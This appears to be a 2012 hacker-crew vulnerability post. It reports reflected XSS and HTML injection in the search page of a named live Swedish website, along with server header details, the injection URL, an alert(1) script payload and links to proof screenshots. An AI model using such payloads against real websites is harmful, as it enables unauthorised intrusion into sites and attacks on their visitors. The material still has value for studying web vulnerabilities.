Title : TMR XSS + HTML Injection

+-------------------------------------------+
Title : TMR XSS + HTML Injection
Target site : http://timra.se/
Vuln Type : Hyper Text Markup Language Injection
Author : Avatar Fearless
Info (i) ~~~~~~
Header's :
HTTP/1.1 200 OK =>
Cache-Control => private
Content-Type => text/html; charset=utf-8
Expires => Thu, 11 Oct 2012 16:15:34 GMT
Server => Microsoft-IIS/7.5
Set-Cookie => ASP.NET_SessionId=aulv0q5u52murewpydzjbjc2; path=/; HttpOnly
X-AspNet-Version => 4.0.30319
X-Powered-By => ASP.NET
Date => Fri, 12 Oct 2012 16:15:34 GMT
Connection => close
Content-Length => 19669
Tested on : WIndows 7 Professional x86
Analytics : Google Analytics
[# 	Website 	Pageviews
1 	www.google.com 	32,074
2 	stackoverflow.com 	25,706
3 	www.reddit.com 	22,825]
System :
~jQuery(Javascript Framework)
~IIS (Web Server)
~Microsoft ASP.NET(Web Framework)
~Windows Server(Operating System)
+-------------------------------------------+
Vulnerability on : Search System(Search Plugin/widget)

+------------------!Using HTML injection!------------------+
Taget : www.timra.se
Searching something easy(ex: asd) :
http://timra.se/sok/?query=asd
Using <h1> HTML tag`s :
http://timra.se/sok/
It parse in URL & take in input. But it not parse in search textbox & it take in input.
http://imageshack.us/scaled/landing/28/tmrw.png

+------------------!Using Cross Site Scripting{XSS}!------------------+
Target : www.timra.se
Searching Something easy[again ;P](ex: asd) :
http://timra.se/sok/?query=asd
Using most usually JS(Javascript) tag <script>alert(1);</script> :
http://timra.se/sok/
It parse in URL & take in input. But it not parse in search textbox & it take in input.
http://imageshack.us/scaled/landing/21/tmr2.png

Bonus Proof :
http://youtu.be/qJo-daSAXnY

SHOUT`ZZZ & RESPECT TO :
Anti-armenia.ORG (AA - Anti-armenia Team)
All My Bro'S & ESPECIALLY :
AkaStep , MetaizM , Ferid23 , BOT_25 , Leroy , AzSecurity
All Anti-armenia Team member's!!!
+-------------------------------------------+